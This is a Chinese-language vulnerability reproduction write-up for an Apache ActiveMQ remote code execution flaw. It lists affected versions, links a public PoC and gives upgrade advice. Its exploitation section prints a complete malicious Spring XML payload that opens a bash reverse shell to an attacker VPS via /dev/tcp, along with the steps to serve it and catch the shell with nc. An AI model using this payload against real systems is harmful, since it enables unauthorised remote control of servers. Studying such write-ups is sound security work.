Apache ActiveMQ RCE漏洞复现

Apache ActiveMQ RCE漏洞复现

1、 产品简介

ActiveMQ是一种开源的基于JMS(Java Message Servie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。

2、 漏洞概述

Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。

3、 影响范围

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

4、 漏洞复现

PoC地址:https://github.com/trganda/ActiveMQ-RCE

把项目Get到本地,导入IDEA中运行

因为我电脑上JDK安装的是1.8.0,直接运行会发现报错

所以在此处安装JDK11:

5、 漏洞利用

准备好恶意文件:rec.xml,将其上传到自己的VPS,其中将your-ip改成自己vps地址。

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

 xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

 <constructor-arg>

 <list>

 <value>bash</value>

 <value>-c</value>

 <value><![CDATA[bash -i >& /dev/tcp/your-ip/6666 0>&1]]></value>

 </list>

 </constructor-arg>

 </bean>

</beans>

修改Main.java以下两处,一个是目标地址,一个是恶意文件地址

在vps中使用python开启http服务

再使用nc实现监听

接着运行Main.java

成功反弹shell,ls查看拿到flag

6、 修复建议

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复:

Apache ActiveMQ >= 5.18.3

Apache ActiveMQ >= 5.17.6

Apache ActiveMQ >= 5.16.7

Apache ActiveMQ >= 5.15.16

相关推荐
网络安全queen3 小时前
html网络安全工具源码 网络安全前端
安全·web安全
网络安全-老纪5 小时前
网络安全之如何发现安全漏洞
网络·安全·web安全
网络安全筑盾者-燕子7 小时前
计算机网络-OSI七层参考模型与数据封装,网络安全零基础入门到精通实战教程!
网络·计算机网络·安全·web安全·网络安全·osi
仇辉攻防11 小时前
【云安全】云原生-Docker(六)Docker API 未授权访问
web安全·网络安全·docker·云原生·容器·kubernetes·安全威胁分析
上海控安15 小时前
鉴源实验室·HTTPS对于网络安全的重要性
网络协议·web安全·https
网络安全queen15 小时前
网络安全大数据架构 网络安全之数据安全
大数据·网络·web安全
浩浩测试一下15 小时前
NAT(网络地址转换)技术详解:网络安全渗透测试中的关键应用与防御策略
运维·服务器·安全·web安全·网络安全·系统安全·可信计算技术
Apache IoTDB16 小时前
Apache IoTDB v2.0.1-beta 发布|树、表双模型支持,更灵活更全面!
apache·iotdb
黑客KKKing16 小时前
如何连接别人的redis服务器吗?
网络·安全·web安全·电脑
网络安全-杰克16 小时前
什么是网络安全?网络安全防范技术包括哪些?
网络·安全·web安全